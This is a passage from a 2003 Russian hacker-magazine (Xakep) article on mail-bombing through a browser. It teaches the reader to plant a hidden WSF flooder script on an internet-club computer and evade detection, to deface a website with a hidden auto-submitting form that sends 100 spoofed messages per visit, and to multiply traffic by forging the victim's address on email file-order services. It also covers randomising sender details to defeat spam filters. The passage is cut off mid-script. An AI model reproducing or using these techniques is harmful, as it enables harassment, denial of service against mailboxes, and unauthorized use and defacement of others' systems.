| Издательский дом ООО "Гейм Лэнд" | СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #33, АВГУСТ 2003 г. |
ОФИСНЫЙ СПАМ - бомбежка из броузера
Анализирующий
Спецвыпуск Xakep, номер #033, стр. 033-050-4
WsCript.Sleep 1200000
'Длительность паузы в миллисекундах.
'Ты ведь не хочешь, чтобы тебя сразу схватили?
WshShell.Run Progname,0
'Запускаем флудер в невидимом режиме.
]]>
</script>
</job>
Теперь сохрани его в текстовом формате с расширением WSF, сливай оба файла на дискетку и иди в клуб (траф в клубе должен быть неограниченным, иначе админы тебе все почки поотбивают), пихай в какой-нибудь каталог поглубже и запускай скрипт. Сразу не уходи - поиграй немного, для вида. Остается только пожинать плоды столь кропотливой работы :).
УВЕЛИЧЬ МАСШТАБЫ
Если ты продвинутый хакер, то можешь задефейсить какой-либо сайт, добавив в главную страницу эту форму. Предварительно сделай все элементы скрытыми, а текст сообщения одного цвета с фоном. Например:
<HTML>
<HEAD>
</HEAD>
<BODY>
<form name="formname" action="http://www.anysite.com/cgi-bin/mailsender.cgi" method="POST">
<input type="hidden" name="fname" value="President"><BR>
<input type="hidden" name="femail" value="president@whitehouse.gov"><BR>
<input type="hidden" name="toemail" value="billgates@microsoft.com"><BR>
<input type="hidden" name="subject" value="Hi"><BR>
<div name="body" style="color=blue;background color=blue">Hi, Bill</div><BR>
<input type="hidden" name="lng" value="ru">
<input type="hidden" name="v" value="post">
</form>
<Script type="text/vbsript">
sub window_onload
m=100
for x=1 to m
document.formname.submit.
next
end
</Script>
Остальной код страницы тут
</BODY>
</HTML>
Теперь при каждом посещении задефейсенной паги к жертве будут улетать m сообщений.
ТОННЫ МУСОРА ПО УЗКОМУ КАНАЛУ
Если у тебя Dial-Up и скорость доступа в Инет оставляет желать лучшего, то воспользуйся эффектом умножения. Поясняю. Существуют различные службы, предоставляющие доступ ресурсам Сети (например, к FTP) через электронную почту. Тебе остается оформить заказ на файлик, размером мегабайт так в 15-20, указав в поле "От кого: (From:)" адрес жертвы. Жалко, что у таких служб стоит ограничение на количество принимаемых заявок. Некоторые службы высылают справку по своей работе, если на ее адрес будет получено письмо со словом "Help" в теле или заголовке. Также следует обратить внимание на ссылки "Заказать на E-Mail" на софтверных (и не только) сайтах. Ну а если встретишь сервис с поддержкой аттачей без предварительной закачки на сервер, то считай, что тебе крупно повезло :)).
Если же хочешь ограничиться простым флудом почтового ящика, то я рекомендую при каждом "сеансе" случайным образом генерировать адрес и ник отправителя, тему письма и др. В этом случае обычные антиспаммерские фильтры будут бессильны - ведь обратный-то адрес каждый раз новый! Пример такого подхода приведен ниже. Для начала создай HTML-документ с именем, ну, например, send.htm.
<HTML>
<HEAD>
</HEAD>
<META HTTP-EQUIV="refresh" CONTENT="2; URL=pause.html ">
<BODY>
<SCRIPT TYPE="text/VBScript"><!--